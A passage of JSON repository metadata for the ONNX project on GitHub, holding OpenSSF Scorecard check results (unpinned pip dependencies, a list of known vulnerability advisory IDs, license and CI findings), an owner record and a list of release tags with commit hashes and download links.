pipCommand not pinned by hash: .github/workflows/lint.yml:80","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:85","Warn: pipCommand not pinned by hash: .github/workflows/lint.yml:86","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:151","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:161","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:171","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:189","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:195","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:249","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:266","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:37","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:38","Warn: pipCommand not pinned by hash: .github/workflows/pages.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/pr_checks.yml:36","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:49","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:50","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:57","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/preview_source_dist_test.yml:59","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:81","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:82","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:112","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:113","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:119","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:120","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:126","Warn: pipCommand not pinned by hash: .github/workflows/release_linux.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:47","Warn: pipCommand not pinned by hash: .github/workflows/release_mac.yml:48","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:45","Warn: pipCommand not pinned by hash: .github/workflows/release_sdist.yml:46","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:42","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/weekly_modelzoo.yml:55","Info:  59 out of  61 GitHub-owned GitHubAction dependencies pinned","Info:  22 out of  27 third-party GitHubAction dependencies pinned","Info:   0 out of  49 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#pinned-dependencies"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: Apache License 2.0: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#license"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/create_release.yml:152"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#packaging"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#branch-protection"}},{"name":"SAST","score":10,"reason":"SAST tool is run on all commits","details":["Info: SAST configuration detected: CodeQL","Info: all commits (30) are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"74 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-6rq9-53c3-f7vj","Warn: Project is vulnerable to: PYSEC-2023-38 / GHSA-ffxj-547x-5j7c","Warn: Project is vulnerable to: PYSEC-2025-10 / GHSA-h36j-8vv3-cj52","Warn: Project is vulnerable to: PYSEC-2024-223 / GHSA-h8wv-9h96-m4hr","Warn: Project is vulnerable to: PYSEC-2024-222 / GHSA-whh8-fjgc-qp73","Warn: Project is vulnerable to: GHSA-3c5c-7235-994j","Warn: Project is vulnerable to: GHSA-3f63-hfp8-52jq","Warn: Project is vulnerable to: PYSEC-2021-41 / GHSA-3wvg-mj6g-m9cv","Warn: Project is vulnerable to: PYSEC-2020-77 / GHSA-3xv8-3j54-hgrp","Warn: Project is vulnerable to: PYSEC-2020-80 / GHSA-43fq-w8qq-v88h","Warn: Project is vulnerable to: GHSA-44wm-f244-xhp3","Warn: Project is vulnerable to: GHSA-4fx9-vc88-q2xc","Warn: Project is vulnerable to: PYSEC-2021-35 / GHSA-57h3-9rgr-c24m","Warn: Project is vulnerable to: PYSEC-2020-172 / GHSA-5gm3-px64-rw72","Warn: Project is vulnerable to: PYSEC-2021-331 / GHSA-7534-mm45-c74v","Warn: Project is vulnerable to: PYSEC-2021-92 / GHSA-7r7m-5h27-29hp","Warn: Project is vulnerable to: PYSEC-2020-78 / GHSA-8843-m7mw-mxqm","Warn: Project is vulnerable to: PYSEC-2023-227 / GHSA-8ghj-p4vj-mr35","Warn: Project is vulnerable to: PYSEC-2014-87 / GHSA-8m9x-pxwq-j236","Warn: Project is vulnerable to: PYSEC-2022-10 / GHSA-8vj2-vxx3-667w","Warn: Project is vulnerable to: PYSEC-2021-36 / GHSA-8xjq-8fcg-g5hw","Warn: Project is vulnerable to: PYSEC-2016-6 / GHSA-8xjv-v9xq-m5h9","Warn: Project is vulnerable to: PYSEC-2021-42 / GHSA-95q3-8gr9-gm8w","Warn: Project is vulnerable to: PYSEC-2022-168 / GHSA-9j59-75qj-795w","Warn: Project is vulnerable to: PYSEC-2014-10 / GHSA-cfmr-38g9-f2h7","Warn: Project is vulnerable to: PYSEC-2020-76 / GHSA-cqhg-xjhh-p8hf","Warn: Project is vulnerable to: PYSEC-2021-40 / GHSA-f4w8-cv6p-x6r5","Warn: Project is vulnerable to: PYSEC-2021-69 / GHSA-f5g8-5qq7-938w","Warn: Project is vulnerable to: PYSEC-2021-139 / GHSA-g6rj-rv7j-xwp4","Warn: Project is vulnerable to: PYSEC-2015-16 / GHSA-h5rf-vgqx-wjv2","Warn: Project is vulnerable to: PYSEC-2016-5 / GHSA-hggx-3h72-49ww","Warn: Project is vulnerable to: PYSEC-2020-84 / GHSA-hj69-c76v-86wr","Warn: Project is vulnerable to: PYSEC-2016-7 / GHSA-hvr8-466p-75rh","Warn: Project is vulnerable to: PYSEC-2015-15 / GHSA-j6f7-g425-4gmx","Warn: Project is vulnerable to: GHSA-j7hp-h8jx-5ppr","Warn: Project is vulnerable to: PYSEC-2019-110 / GHSA-j7mj-748x-7p78","Warn: Project is vulnerable to: GHSA-jgpv-4h4c-xhw3","Warn: Project is vulnerable to: PYSEC-2022-42979 / GHSA-m2vv-5vj5-2hm7","Warn: Project is vulnerable to: PYSEC-2021-37 / GHSA-mvg9-xffr-p774","Warn: Project is vulnerable to: PYSEC-2020-83 / GHSA-p49h-hjvm-jg3h","Warn: Project is vulnerable to: PYSEC-2022-8 / GHSA-pw3c-h7wp-cvhx","Warn: Project is vulnerable to: PYSEC-2021-93 / GHSA-q5hq-fp76-qmrc","Warn: Project is vulnerable to: PYSEC-2020-82 / GHSA-r7rm-8j6h-r933","Warn: Project is vulnerable to: PYSEC-2014-23 / GHSA-r854-96gq-rfg3","Warn: Project is vulnerable to: PYSEC-2016-8 / GHSA-rwr3-c2q8-gm56","Warn: Project is vulnerable to: PYSEC-2020-81 / GHSA-vcqg-3p29-xw73","Warn: Project is vulnerable to: PYSEC-2020-79 / GHSA-vj42-xq3r-hr3r","Warn: Project is vulnerable to: PYSEC-2021-70 / GHSA-vqcj-wrf2-7v73","Warn: Project is vulnerable to: PYSEC-2016-9 / GHSA-w4vg-rf63-f3j3","Warn: Project is vulnerable to: PYSEC-2014-22 / GHSA-x895-2wrm-hvp7","Warn: Project is vulnerable to: PYSEC-2022-9 / GHSA-xrcv-f9gm-v42c","Warn: Project is vulnerable to: PYSEC-2021-137","Warn: Project is vulnerable to: PYSEC-2021-138","Warn: Project is vulnerable to: PYSEC-2021-317","Warn: Project is vulnerable to: PYSEC-2021-38","Warn: Project is vulnerable to: PYSEC-2021-39","Warn: Project is vulnerable to: PYSEC-2021-94","Warn: Project is vulnerable to: PYSEC-2023-175","Warn: Project is vulnerable to: PYSEC-2018-34 / GHSA-2fc2-6r4j-p65h","Warn: Project is vulnerable to: PYSEC-2021-856 / GHSA-5545-2q6w-2gh6","Warn: Project is vulnerable to: PYSEC-2019-108 / GHSA-9fq2-x9r6-wfmf","Warn: Project is vulnerable to: PYSEC-2018-33 / GHSA-cw6w-4rcx-xphc","Warn: Project is vulnerable to: PYSEC-2021-857 / GHSA-f7c7-j99h-c22f","Warn: Project is vulnerable to: GHSA-fpfv-jqm9-f5jm","Warn: Project is vulnerable to: PYSEC-2017-1 / GHSA-frgw-fgh6-9g52","Warn: Project is vulnerable to: PYSEC-2022-48 / GHSA-77rm-9x9h-xj3g","Warn: Project is vulnerable to: GHSA-8gq9-2x98-w8hf","Warn: Project is vulnerable to: GHSA-8qvm-5x2c-j2w7","Warn: Project is vulnerable to: PYSEC-2017-65 / GHSA-jwvw-v7c5-m82h","Warn: Project is vulnerable to: PYSEC-2013-22 / GHSA-27x4-j476-jp5f","Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-cx63-2mw6-8hw5","Warn: Project is vulnerable to: PYSEC-2022-43012 / GHSA-r9hx-vwmv-q579","Warn: Project is vulnerable to: PYSEC-2022-43017 / GHSA-qwmp-2cf2-g9g6"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#vulnerabilities"}},{"name":"CI-Tests","score":10,"reason":"30 out of 30 merged PRs checked by a CI test -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 30 contributing companies or organizations","details":["Info: found contributions from: EasyRPG, PeachPy, ScottyLabs, ZhaobangChina, amd, anthropics, barnowl, chainer, couler-proj, cpprefjp, cryfs, cupy, dotnet, facebook, ghc, gsoc-cn, intelligent-machine-learning, k9mail, microsoft, microsoft research, mrbgems, nanyang technological university, nvidia, onnx, open-keychain, pytorch, sipb, skywork ai, sql-machine-learning, uc berkeley"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/ab2f6e92482462fe66246d9e32f642855a691dc1/docs/checks.md#contributors"}}]},"last_synced_at":"2025-08-17T07:32:27.176Z","repository_id":24890799,"created_at":"2025-08-17T07:32:27.176Z","updated_at":"2025-08-17T07:32:27.176Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30051118,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-03T15:26:47.567Z","status":"ssl_error","status_checked_at":"2026-03-03T15:26:17.132Z","response_time":61,"last_error":"SSL_connect returned=1 errno=0 peeraddr=140.82.121.5:443 state=error: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"onnx","name":"Open Neural Network Exchange","uuid":"31675368","kind":"organization","description":"ONNX is an open ecosystem for interoperable AI models. It's a community project: we welcome your contributions!","email":null,"website":"https://onnx.ai","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/31675368?v=4","repositories_count":25,"last_synced_at":"2024-04-18T02:52:20.873Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/onnx","funding_links":[],"total_stars":37281,"followers":1377,"following":0,"created_at":"2022-11-02T16:24:54.756Z","updated_at":"2024-04-18T02:52:25.131Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/onnx/repositories"},"tags":[{"name":"v1.20.1","sha":"d3f6b795aedb48eaecc881bf5e8f5dd6efbe25b3","kind":"commit","published_at":"2026-01-09T23:10:46.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.20.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"bca0315ff3e56bb5847509ca32fadb8d87f680e1","kind":"commit","published_at":"2025-12-01T17:08:15.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.20.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.20.0/manifests"},{"name":"v1.19.1","sha":"b751946c3d59a3c8358abcc0569b59e6ddb08cdd","kind":"commit","published_at":"2025-10-08T03:53:00.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"57b9c6a4f6eebb09ae1b34cfb632078518f72832","kind":"commit","published_at":"2025-08-26T21:37:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.19.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.19.0/manifests"},{"name":"v1.18.0","sha":"e709452ef2bbc1d113faf678c24e6d3467696e83","kind":"commit","published_at":"2025-05-08T17:33:57.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.18.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.18.0/manifests"},{"name":"v1.17.0","sha":"b8baa8446686496da4cc8fda09f2b6fe65c2a02c","kind":"commit","published_at":"2024-09-30T22:42:05.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.17.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.17.0/manifests"},{"name":"v1.16.2","sha":"3bf92c03a9f27eba3bda1e5b9e63ea20ec213557","kind":"commit","published_at":"2024-07-31T13:15:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"595228d99e3977ac27cb79d5963adda262af99ad","kind":"commit","published_at":"2024-05-23T16:33:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"990217f043af7222348ca8f0301e17fa7b841781","kind":"commit","published_at":"2024-03-25T13:55:50.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.16.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.16.0/manifests"},{"name":"v1.15.0","sha":"b86cc54efce19530fb953e4b21f57e6b3888534c","kind":"commit","published_at":"2023-10-25T22:10:41.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.15.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.15.0/manifests"},{"name":"v1.14.1","sha":"1014f41f17ecc778d63e760a994579d96ba471ff","kind":"commit","published_at":"2023-08-24T22:20:34.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"a0d77f18516d2da7468a96b0de3b737266f23176","kind":"commit","published_at":"2023-05-04T00:14:24.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.14.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.14.0/manifests"},{"name":"v1.13.1","sha":"ad834eb73ee0cd9b6fa9ea892caeed5fa17d7dc0","kind":"commit","published_at":"2023-02-21T22:21:30.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"1ba785612a79fe749aa1e478336e534743372639","kind":"commit","published_at":"2022-12-09T18:56:29.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.13.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.13.0/manifests"},{"name":"v1.12.0","sha":"f7ee1ac60d06abe8e26c9b6bbe1e3db5286b614b","kind":"commit","published_at":"2022-06-17T23:32:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.12.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"96046b8ccfb8e6fa82f6b2b34b3d56add2e8849c","kind":"commit","published_at":"2022-02-16T23:56:21.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.11.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.11.0/manifests"},{"name":"v1.10.2","sha":"da889e6b95750350726d149bf447bf0cd1245964","kind":"commit","published_at":"2021-10-25T15:52:09.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.2","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1f63dcb7fcc3a8bf5c3c8e326867ecd6f5c43f35","kind":"commit","published_at":"2021-08-02T16:53:07.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"7c1e0b0391d06002789e56f8fe0c7bb9f4d1159b","kind":"commit","published_at":"2021-07-30T20:26:55.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.10.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.10.0/manifests"},{"name":"v1.9.0","sha":"1089b9e8045a3a2882d7bb6a1dbaeaf9cae131da","kind":"commit","published_at":"2021-04-19T09:51:42.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.9.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.9.0/manifests"},{"name":"v1.8.1","sha":"685898bc6f3fd6eb16ba129ea990f96330537e38","kind":"commit","published_at":"2021-01-29T23:23:52.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"994c6181247d7b419b28889fc57d5817e2089419","kind":"commit","published_at":"2020-11-06T05:01:27.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.8.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.8.0/manifests"},{"name":"v1.7.0","sha":"0c070abb0c40fec649f81a73a75b0098662ec486","kind":"commit","published_at":"2020-05-08T21:09:31.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.7.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"553df22c67bee5f0fe6599cff60f1afc6748c635","kind":"commit","published_at":"2019-09-25T20:35:26.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.6.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.6.0/manifests"},{"name":"v1.5.0","sha":"94d238d96e3fb3a7ba34f03c284b9ad3516163be","kind":"commit","published_at":"2019-04-24T05:05:06.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.5.0","html_url":"https://github.com/onnx/onnx/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.5.0/manifests"},{"name":"v1.4.1","sha":"9e55ace55aad1ada27516038dfbdc66a8a0763db","kind":"commit","published_at":"2019-01-23T23:05:32.000Z","download_url":"https://codeload.github.com/onnx/onnx/tar.gz/v1.4.1","html_url":"https://github.com/onnx/onnx/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/onnx/onnx@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/onnx%2Fonnx/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts